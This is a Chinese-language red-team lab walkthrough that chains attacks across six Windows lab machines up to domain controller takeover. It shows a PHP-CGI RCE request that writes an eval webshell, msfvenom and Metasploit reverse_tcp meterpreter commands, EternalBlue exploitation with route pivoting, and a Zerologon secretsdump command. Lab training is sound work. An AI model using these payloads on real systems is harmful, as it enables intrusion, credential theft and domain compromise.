VPC1红队内网渗透靶场-PHPRCE-永恒之蓝-防火墙上线-密码喷射-DC域控提权-weblogic
字数 1519 2025-08-29 22:41:39

VPC1红队内网渗透靶场实战教学文档

环境搭建

下载与配置

  • 靶场下载:百度网盘链接(提取码: ga54)
  • 网络配置
    • vmware8/NAT:192.168.139.0网段
    • vmware2:192.168.2.0网段
    • vmware3:192.168.3.0网段
    • vmware10:192.168.10.0网段

靶机组成

  1. Windows Server 2012 (运行XAMPP服务)
  2. Windows 7
  3. Windows 10
  4. Windows Server 2012 R2 (Weblogic单机)
  5. Windows Server 2012-WEB
  6. Windows Server 2016-AD-2016 (域控制器)

渗透流程详解

第一阶段:Windows Server 2012渗透

信息收集

  • 目标开放80端口,运行XAMPP服务

PHP-CGI漏洞利用

  1. 漏洞验证
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
  1. 写入Webshell
<?php file_put_contents("../htdocs/1.php", " <?php @eval($_POST['attack']);?> "); ?>
  • 成功写入后门文件到/htdocs/目录
  • 使用中国菜刀/蚁剑连接webshell
  1. CS上线
  • 生成后门并上传执行
  • 成功获取meterpreter会话

第二阶段:Windows 7渗透

信息收集

  • 端口扫描发现仅开放445端口
  • 使用fscan扫描发现存在MS17-010(永恒之蓝)漏洞

永恒之蓝漏洞利用

  1. MSF配置
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=5210 -f exe -o 5210.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.129
set lport 1234
run
  1. 路由设置
run autoroute -p  # 查看当前路由表
run post/multi/manage/autoroute  # 添加当前路由表
  1. 漏洞利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.2.129
set rhosts 192.168.2.129
set lhost 192.138.2.134
set lport 4548
  1. 后门上传与上线
  • 上传后门文件
  • 设置端口转发实现上线

第三阶段:Windows 10渗透

密码喷射攻击

  • 获取Administrator密码
  • 进行横向移动

第四阶段:Windows Server R2(Weblogic)渗透

信息收集

  • 发现7001端口(Weblogic服务)

攻击步骤

  1. 建立代理访问Weblogic
  2. 使用集成攻击工具
  3. 植入内存马
  4. 成功上线CS

第五阶段:Windows Server 2012 WEB渗透

密码抓取

  • 获取系统密码
  • 尝试横向移动

防火墙绕过

  • 由于防火墙限制,无法使用反向上线
  • 采用正向上线方式:
    1. 使用IPC协议共享文件
    2. 使用atexec执行命令
    3. 成功上线

第六阶段:域控制器(DC)渗透

信息收集

net time /domain  # 确认域环境

CVE-2020-1472漏洞利用

  1. 使用Impacket工具
python secretsdump.py "xiaodi.org/dc$@192.168.10.10" -no-pass
  • 获取域控管理员凭证
  1. 获取Shell
  • 使用获取的凭证获取域控Shell
  • 上线CS

关键技术与技巧总结

  1. PHP-CGI漏洞利用

    • 注意allow_url_include和auto_prepend_file参数
    • 文件写入路径需要准确(通常为/htdocs/)
  2. 永恒之蓝利用要点

    • 内网环境需要先建立路由
    • 注意payload与目标系统架构匹配
    • 可能需要端口转发才能上线
  3. 内网横向移动

    • 密码喷射攻击
    • IPC共享+atexec执行
    • 正反向连接选择
  4. 域渗透技巧

    • 使用net time /domain确认域环境
    • CVE-2020-1472漏洞利用
    • Impacket工具链使用
  5. 防火墙绕过

    • 正向上线技术
    • 文件共享与远程执行组合

常见问题解决

  1. 永恒之蓝利用失败

    • 检查目标系统补丁状态
    • 确认payload架构匹配
    • 验证网络路由设置
  2. 正向上线受阻

    • 检查防火墙规则
    • 尝试不同协议(IPC, SMB等)
    • 验证凭证有效性
  3. Weblogic攻击问题

    • 确认Weblogic版本
    • 尝试不同内存马
    • 检查代理设置是否正确

总结

本靶场涵盖了从外网渗透到内网横向移动,再到域控提权的完整攻击链。关键技术点包括:

  • Web应用漏洞利用(PHP-CGI)
  • 系统漏洞利用(永恒之蓝)
  • 内网信息收集与横向移动
  • 域环境渗透与提权
  • 防火墙绕过技术

通过此靶场练习,可以全面掌握红队渗透测试的核心技能和实战思路。

VPC1红队内网渗透靶场实战教学文档 环境搭建 下载与配置 靶场下载 :百度网盘链接(提取码: ga54) 网络配置 : vmware8/NAT:192.168.139.0网段 vmware2:192.168.2.0网段 vmware3:192.168.3.0网段 vmware10:192.168.10.0网段 靶机组成 Windows Server 2012 (运行XAMPP服务) Windows 7 Windows 10 Windows Server 2012 R2 (Weblogic单机) Windows Server 2012-WEB Windows Server 2016-AD-2016 (域控制器) 渗透流程详解 第一阶段:Windows Server 2012渗透 信息收集 目标开放80端口,运行XAMPP服务 PHP-CGI漏洞利用 漏洞验证 : 写入Webshell : 成功写入后门文件到/htdocs/目录 使用中国菜刀/蚁剑连接webshell CS上线 : 生成后门并上传执行 成功获取meterpreter会话 第二阶段:Windows 7渗透 信息收集 端口扫描发现仅开放445端口 使用fscan扫描发现存在MS17-010(永恒之蓝)漏洞 永恒之蓝漏洞利用 MSF配置 : 路由设置 : 漏洞利用 : 后门上传与上线 : 上传后门文件 设置端口转发实现上线 第三阶段:Windows 10渗透 密码喷射攻击 获取Administrator密码 进行横向移动 第四阶段:Windows Server R2(Weblogic)渗透 信息收集 发现7001端口(Weblogic服务) 攻击步骤 建立代理访问Weblogic 使用集成攻击工具 植入内存马 成功上线CS 第五阶段:Windows Server 2012 WEB渗透 密码抓取 获取系统密码 尝试横向移动 防火墙绕过 由于防火墙限制,无法使用反向上线 采用正向上线方式: 使用IPC协议共享文件 使用atexec执行命令 成功上线 第六阶段:域控制器(DC)渗透 信息收集 CVE-2020-1472漏洞利用 使用Impacket工具 : 获取域控管理员凭证 获取Shell : 使用获取的凭证获取域控Shell 上线CS 关键技术与技巧总结 PHP-CGI漏洞利用 : 注意allow_ url_ include和auto_ prepend_ file参数 文件写入路径需要准确(通常为/htdocs/) 永恒之蓝利用要点 : 内网环境需要先建立路由 注意payload与目标系统架构匹配 可能需要端口转发才能上线 内网横向移动 : 密码喷射攻击 IPC共享+atexec执行 正反向连接选择 域渗透技巧 : 使用net time /domain确认域环境 CVE-2020-1472漏洞利用 Impacket工具链使用 防火墙绕过 : 正向上线技术 文件共享与远程执行组合 常见问题解决 永恒之蓝利用失败 : 检查目标系统补丁状态 确认payload架构匹配 验证网络路由设置 正向上线受阻 : 检查防火墙规则 尝试不同协议(IPC, SMB等) 验证凭证有效性 Weblogic攻击问题 : 确认Weblogic版本 尝试不同内存马 检查代理设置是否正确 总结 本靶场涵盖了从外网渗透到内网横向移动,再到域控提权的完整攻击链。关键技术点包括: Web应用漏洞利用(PHP-CGI) 系统漏洞利用(永恒之蓝) 内网信息收集与横向移动 域环境渗透与提权 防火墙绕过技术 通过此靶场练习,可以全面掌握红队渗透测试的核心技能和实战思路。